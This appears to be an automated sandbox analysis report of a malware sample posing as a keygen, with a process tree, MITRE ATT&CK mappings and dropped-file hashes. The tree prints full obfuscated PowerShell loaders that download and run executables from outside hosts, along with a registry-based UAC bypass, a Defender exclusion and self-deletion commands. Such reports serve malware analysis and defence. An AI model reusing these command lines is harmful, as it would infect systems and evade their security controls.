                        "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                        10⤵
                        • Executes dropped EXE
                        PID:2764
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:2404
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:1100
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:1592
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:2672
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:2916
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:1188
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:2436
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:528
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:2792
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:2244
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:2856
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:1640
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:1976
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:2464
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:2944
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    8⤵
                      PID:932
                • C:\Users\Public\ogp.exe
                  "C:\Users\Public\ogp.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:932
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\761A.tmp\b1.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:596
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:400
              • C:\Users\Public\rte.exe
                "C:\Users\Public\rte.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2172
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                  "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2400
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:2520
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 2520 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\123375905544865\\* & exit
                      8⤵
                        PID:628
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /pid 2520
                          9⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2776
                  • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                    "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    PID:2424
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                      7⤵
                      • Executes dropped EXE
                      PID:572
                  • C:\Users\Public\rte.exe
                    "C:\Users\Public\rte.exe"
                    6⤵
                    • Executes dropped EXE
                    PID:832
            • C:\Windows\SysWOW64\timeout.exe
              timeout 2
              3⤵
              • Delays execution with timeout.exe
              PID:336
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\761A.tmp\ba.hta"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1444
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Blocklisted process makes network request
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1152
                • C:\Users\Public\eli.exe
                  "C:\Users\Public\eli.exe"
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2632
                  • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                    "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    PID:2776
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                      7⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks processor information in registry
                      PID:1368
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /pid 1368 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\574139722025332\\* & exit
                        8⤵
                          PID:1132
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /pid 1368
                            9⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2332
                    • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of SetWindowsHookEx
                      PID:2804
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:1528
                    • C:\Users\Public\eli.exe
                      "C:\Users\Public\eli.exe"
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Drops desktop.ini file(s)
                      • Modifies system certificate store
                      PID:2888
                      • C:\Users\Admin\AppData\Local\Temp\Ek7NYgEQu0.exe
                        "C:\Users\Admin\AppData\Local\Temp\Ek7NYgEQu0.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2736
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                          "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\Ek7NYgEQu0.exe"'
                          8⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1352
                      • C:\Users\Admin\AppData\Local\Temp\07PMEGvU7y.exe
                        "C:\Users\Admin\AppData\Local\Temp\07PMEGvU7y.exe"
                        7⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        PID:1652
                        • C:\Windows\SysWOW64\Notepad.exe
                          "C:\Windows\System32\Notepad.exe"
                          8⤵
                            PID:1124
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c C:\Users\Public\Natso.bat
                              9⤵
                                PID:2456
                                • C:\Windows\SysWOW64\reg.exe
                                  reg delete hkcu\Environment /v windir /f
                                  10⤵
                                  • Modifies registry key
                                  PID:2840
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
                                  10⤵
                                  • Modifies registry key
                                  PID:2168
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                                  10⤵
                                    PID:2196
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg delete hkcu\Environment /v windir /f
                                    10⤵
                                    • Modifies registry key
                                    PID:2072
                              • C:\Program Files (x86)\internet explorer\ieinstal.exe
                                "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                8⤵
                                  PID:2904
                              • C:\Users\Admin\AppData\Local\Temp\7aaHO2U6ad.exe
                                "C:\Users\Admin\AppData\Local\Temp\7aaHO2U6ad.exe"
                                7⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of SetWindowsHookEx
                                PID:1372
                                • \??\c:\windows\SysWOW64\cmstp.exe
                                  "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\4j0rlenz.inf
                                  8⤵
                                    PID:2352
                                • C:\Users\Admin\AppData\Local\Temp\HhNbf5FCLG.exe
                                  "C:\Users\Admin\AppData\Local\Temp\HhNbf5FCLG.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Windows security modification
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1884
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    "powershell" Get-MpPreference -verbose
                                    8⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2140
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\eli.exe"
                                  7⤵
                                    PID:2924
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /T 10 /NOBREAK
                                      8⤵
                                      • Delays execution with timeout.exe
                                      PID:2240
                          • C:\Windows\SysWOW64\mshta.exe
                            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\761A.tmp\ba1.hta"
                            3⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of WriteProcessMemory
                            PID:1908
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                              4⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1852

                      Network

                      MITRE ATT&CK Matrix ATT&CK v6

                      Persistence

                      Modify Existing Service

                      1
                      T1031

                      Registry Run Keys / Startup Folder

                      1
                      T1060

                      Defense Evasion

                      Modify Registry

                      6
                      T1112

                      Disabling Security Tools

                      2
                      T1089

                      Install Root Certificate

                      1
                      T1130

                      Credential Access

                      Credentials in Files

                      3
                      T1081

                      Discovery

                      Query Registry

                      2
                      T1012

                      System Information Discovery

                      2
                      T1082

                      Collection

                      Data from Local System

                      3
                      T1005

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\ProgramData\MSVCP140.dll
                      • C:\ProgramData\VCRUNTIME140.dll
                      • C:\ProgramData\freebl3.dll
                      • C:\ProgramData\freebl3.dll
                      • C:\ProgramData\freebl3.dll
                      • C:\ProgramData\mozglue.dll
                      • C:\ProgramData\mozglue.dll
                      • C:\ProgramData\mozglue.dll
                      • C:\ProgramData\msvcp140.dll
                      • C:\ProgramData\msvcp140.dll
                      • C:\ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • C:\ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • C:\ProgramData\softokn3.dll
                      • C:\ProgramData\softokn3.dll
                      • C:\ProgramData\softokn3.dll
                      • C:\ProgramData\sqlite3.dll
                      • C:\ProgramData\sqlite3.dll
                      • C:\ProgramData\sqlite3.dll
                      • C:\ProgramData\vcruntime140.dll
                      • C:\ProgramData\vcruntime140.dll
                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1ab2c564-9698-406f-80da-b82bfb15ab48
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1d26d7a3-e8d5-4c81-a5ff-6fdf2769fe46
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_361325fb-5dd8-4a55-bf3a-008ad91267d6
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_38604b7f-3b56-4cdf-857e-df63e390b481
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3a38e600-169e-4ec7-98bd-529788f42566
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_42778251-f07e-4ae1-bc57-a77894ebb1f5
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4c3f706e-97a9-41e8-aca3-b206a4c6c3c2
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5c80f677-3c28-410d-966a-1d329145fa84
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9441e801-8189-415e-b60c-6cb459d7f603
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_999e7dbd-7b0c-47cd-bd79-7b1eed99818d
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9fbae868-181a-4720-b037-8525fd1c3767
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a700e20d-ef30-47d4-abf6-6f8f1430f64a
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                      • C:\Users\Admin\AppData\Local\Temp\07PMEGvU7y.exe
                        MD5

                        013db621a3351e3fb049efd2ccad79ff

                        SHA1

                        a23394ea54dbc5342a77938a2c285ee616185560

                        SHA256

                        df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                        SHA512

                        1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                      • C:\Users\Admin\AppData\Local\Temp\07PMEGvU7y.exe
                        MD5

                        013db621a3351e3fb049efd2ccad79ff

                        SHA1

                        a23394ea54dbc5342a77938a2c285ee616185560

                        SHA256

                        df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                        SHA512

                        1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                      • C:\Users\Admin\AppData\Local\Temp\761A.tmp\Keygen.exe
                      • C:\Users\Admin\AppData\Local\Temp\761A.tmp\Keygen.exe
                      • C:\Users\Admin\AppData\Local\Temp\761A.tmp\b.hta
                      • C:\Users\Admin\AppData\Local\Temp\761A.tmp\b1.hta
                      • C:\Users\Admin\AppData\Local\Temp\761A.tmp\ba.hta
                      • C:\Users\Admin\AppData\Local\Temp\761A.tmp\ba1.hta
                      • C:\Users\Admin\AppData\Local\Temp\761A.tmp\m.hta
                      • C:\Users\Admin\AppData\Local\Temp\761A.tmp\m1.hta
                      • C:\Users\Admin\AppData\Local\Temp\761A.tmp\start.bat
                      • C:\Users\Admin\AppData\Local\Temp\7aaHO2U6ad.exe
                      • C:\Users\Admin\AppData\Local\Temp\7aaHO2U6ad.exe
                      • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                      • C:\Users\Admin\AppData\Local\Temp\Ek7NYgEQu0.exe
                      • C:\Users\Admin\AppData\Local\Temp\Ek7NYgEQu0.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\HhNbf5FCLG.exe
                      • C:\Users\Admin\AppData\Local\Temp\HhNbf5FCLG.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
